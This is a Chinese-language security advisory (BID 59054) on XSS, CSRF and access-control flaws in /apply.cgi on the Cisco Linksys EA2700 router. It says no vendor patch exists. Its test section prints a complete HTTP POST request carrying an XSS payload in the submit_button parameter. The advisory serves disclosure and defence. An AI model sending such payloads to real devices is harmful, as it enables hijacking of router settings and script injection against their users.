发布日期:2013-04-15
更新日期:2013-04-16
受影响系统:
Cisco Linksys EA2700
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59054
Cisco Linksys EA2700是智能Wi-Fi路由器。
Cisco Linksys EA2700(固件版本1.0.12.128947)存在多个安全漏洞,可被恶意用户利用执行跨站脚本和请求伪造攻击,还可绕过某些安全限制。这些漏洞源于没有正确限制对/apply.cgi脚本的访问,造成未授权访问设备设置;/apply.cgi内的"submit_button" POST参数值也没有正确过滤,造成在受影响站点用户浏览器中执行任意HTML和脚本代码;应用没有对HTTP请求的有效性进行检查,造成攻击者控制设备设置。
<*来源:Phil Purviance
链接:
https://superevr.com/blog/2013/dont-use-linksys-routers/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
submit_button=xss'%3balert(1)//934&amp;action=Apply
建议:
--------------------------------------------------------------------------------
厂商补丁:
Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: